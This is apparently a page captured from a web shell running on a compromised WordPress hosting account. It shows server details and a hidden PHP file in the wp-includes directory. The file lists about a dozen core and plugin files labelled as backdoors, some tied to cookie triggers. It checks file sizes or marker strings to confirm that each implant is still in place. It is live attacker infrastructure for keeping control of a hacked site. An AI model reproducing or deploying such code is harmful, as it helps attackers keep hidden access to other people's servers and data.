HEX
Server: LiteSpeed
System: Linux server.oktopus-tech.com 4.18.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
User: tomdaddy (1023)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_nice,proc_terminate,pfsockopen,dl,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,leak,apache_child_terminate
Upload Files
File: /home/tomdaddy/public_html/site16.tomdaddy.com/wp-includes/.cache
<?php   $r = '/home/tomdaddy/public_html/site16.tomdaddy.com'; $x = ["/index.php"=>"bd@@339454@@45",
"/wp-admin/post.php"=>"bd@@346146@@data_storage",
"/wp-includes/media.php"=>"bd@@337988@@_COOKIE[3]",
"/wp-content/plugins/ftech-plugin/lib/codestar-framework/index.php"=>"bd@@341833@@_COOKIE[3]",
"/wp-content/plugins/envato-market/inc/admin/view/partials/plugins.php"=>"bd@@347569@@36",
"/wp-admin/async-upload.php"=>"bd@@344758@@$_COOKIE[3",
"/wp-admin/customize.php"=>"bd@@347585@@11",
"/wp-admin/setup-config.php"=>"bd@@344780@@70",
"/.well-known/acme-challenge/banner_yearly.php"=>"bd@@339923@@2573",
"/wp-content/plugins/elementor/modules/element-manager/admin.php"=>"bd@@347605@@2281",
"/wp-admin/user/profile.php"=>"bd@@339697@@$_COOKIE[4",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/PEARSax3.php"=>"ui@@9218@@6920",
"/wp-includes/post-formats.php"=>"ui@@9218@@PEARSax3.php"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');